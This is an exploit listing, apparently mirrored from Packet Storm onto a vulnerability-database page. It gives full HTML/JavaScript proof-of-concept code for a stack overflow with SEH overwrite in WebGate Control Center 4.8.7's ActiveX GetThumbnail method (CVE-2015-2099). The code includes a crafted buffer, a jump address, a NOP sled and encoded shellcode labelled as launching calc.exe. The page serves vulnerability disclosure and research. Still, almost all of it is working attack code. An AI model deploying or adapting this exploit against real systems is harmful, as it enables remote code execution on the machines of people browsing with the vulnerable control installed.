Lucene search
+L

WebGate Control Center 4.8.7 GetThumbnail Stack Overflow

🗓️ 27 Mar 2015 00:00:00Reported by Praveen DarshanamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

WebGate Control Center 4.8.7 GetThumbnail Stack Overflo

Related
Code
`<html>  
<!--  
Author: Praveen Darshanam  
http://blog.disects.com/  
http://darshanams.blogspot.com  
  
# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)  
# Date: 27th March, 2015  
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/  
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35  
# Version: Control Center 4.8.7  
# Tested on: Windows XP SP3 using IE/6/7/8  
# CVE : 2015-2099  
  
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"  
prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )"  
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"  
-->  
  
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>  
</object>  
<script>  
  
var buff1 = "";  
var arg2=1;  
var arg3=1;  
var arg4=1;  
var nops = "";  
var buff2 = "";  
  
for (i=0;i<24; i++)  
{  
buff1 += "B";  
}  
  
// jump over seh to shellcode  
nseh = "\xeb\x08PD";  
// pop pop ret  
var seh = "\xa0\xf2\x07\x10";  
  
for (i=0;i<80; i++)  
{  
nops += "\x90";  
}  
//calc.exe payload  
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +  
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +  
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +  
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +  
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +  
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +  
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +  
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +  
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +  
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +  
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +  
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +  
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +  
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +  
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +  
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +  
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +  
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +  
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +  
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +  
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +  
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +  
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +  
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +  
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +  
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +  
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +  
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +  
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +  
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +  
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +  
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +  
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +  
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +  
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";  
  
for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)  
{  
buff2 += "A";  
}  
  
fbuff = buff1 + nseh + seh + nops + sc + buff2;  
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);  
  
</script>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation